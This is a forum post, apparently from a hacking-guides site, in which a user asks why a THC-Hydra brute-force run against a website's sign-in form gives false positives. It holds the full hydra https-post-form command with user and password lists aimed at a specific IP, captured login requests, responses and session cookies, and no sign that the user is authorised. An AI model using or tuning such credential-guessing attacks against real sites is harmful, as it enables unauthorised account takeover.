Forum Thread: Problems with THC-HYDRA Giving False Positive PasswordS

hydra -L userdummy.txt -P passdummy.txt -vV 104.20.113.15 https-post-form "/website.com/sign-in:email=^USER^&password=^PASS^&login=Log+in+to+your+account:F=incorrect.:C= _cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; httpreferer=%2Fsign-in; ga=GA1.2.1543913319.1536632638; gid=GA1.2.1875996076.1536632638; gat=1"

This is my full command using the cookie from the request listed below.
POST /sign-in HTTP/1.1
Host: website.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: website.com/sign-in

Cookie: _cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; httpreferer=%2Fsign-in; ga=GA1.2.1543913319.1536632638; gid=GA1.2.1875996076.1536632638; gat=1

Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 61

email=username&password=password&login=Log+in+to+your+account

This request is a recording of the request form using an invalid username and password. When i use a correct password and username the only thing that has changed has been the end of the cookie "gat=1". It is not there when using a valid and username. I have tried using the cookie from a successful login and changed the "F=" to a "S=" in my hydra call command. The result is as following: "1 of 1 target completed, 0 valid passwords found". And i get "1 of 1 target successfully completed, 24 valid passwords found" as if hydra is not seeing the failure message "email or password are incorect" or the failed request cookie "_cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; httpreferer=%2Fsign-in; ga=GA1.2.1543913319.1536632638; gid=GA1.2.1875996076.1536632638; _gat=1".

For your information the hydra commmand breaks down like this. hydra (calling hydra) -L (use this username list) userlist.txt. -P (use this pass list) passlist.txt -vV (verbose) 127.0.0.0 (host ip) https-get-form (method) "x:xxx:xxx (host url:email/pass parameters/failure message or success message/optional parameter/optional parameter(cookie or header)".

I have tried several variants, including using the header "200 OK" as the optional parameter, in combination and without combination with the cookie. Ive tried not using either, there must be something wrong with the failure parameter, I think hydra is struggling to differentiate a valid login from a failed. Therefore either giving me all valid passwords or all failed.This is a copy of the request form using a valid login and valid password. As you can see gat_1 has disapeared from the cookie and should work to help hydra differentiate from a valid and a failed request.

POST /sign-in HTTP/1.1
Host: website.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: website.com/sign-in

Cookie: _cfduid=de9ff7a7ca4bc2968430ae81bf36e057e1536632635; PHPSESSID=vj8g88oje7k5u0nk9t9cvavlv2; gaTrackGEO=x; SERVERID=fe03; httpreferer=%2Fsign-in; ga=GA1.2.1543913319.1536632638; _gid=GA1.2.1875996076.1536632638

Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

email=iforgot&password=iforgot&login=Log+in+to+your+account

This is the response to that valid request: HTTP/1.1 302 Moved Temporarily
Date: Tue, 11 Sep 2018 02:46:33 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: http_referer=%2Fsign-in; expires=Tue, 11-Sep-2018 03:46:33 GMT; path=/; domain=.website.com

Set-Cookie: loginkey=0067aa09e8bc1b2d92dece7acee917cc; expires=Tue, 18-Sep-2018 02:46:33 GMT; path=/; domain=.website.com

Location: /
Vary: Accept-Encoding
Expect-CT: max-age=604800, report-uri="report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 4586cdfa5b308d1d-PDX
Content-Length: 0uest.

I have tried using the loginkey as the cookie for the success message. Doesn't work.

Connection: close
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: http_referer=%2Fsign-in; expires=Tue, 11-Sep-2018 03:24:37 GMT; path=/; domain=.website.com
Set-Cookie: return_url=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT
Vary: Accept-Encoding
Expect-CT: max-age=604800, report-uri="report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Server: cloudflare
CF-RAY: 4586add9adba8d23-PDX
Content-Length: 9156

This is the response to a request using a invalid password and username. I have tried using the return_url cookie as the failure parameter but it doesn't work either.

I started combing through the source code for hydra to try to find an answer to my problem. I learned that if you escape your colons, then hydra will not count it as a separate parameter (ex: Cookie//:) tried with no success. I also learned that "Set-Cookie" is in the source code for hydra and therefore should be able to read Set-Cookie: XXXX as a valid parameter. I understand that on websites like this no one will do the work for you. As im not looking only for a straightforward answer, but more guidance to find the answer to my problem. Thank you al

Never Miss a Hacking or Security Guide

New Null Byte in your inbox, every week.

Be the First to Respond

Share Your Thoughts

  • Hot
  • Active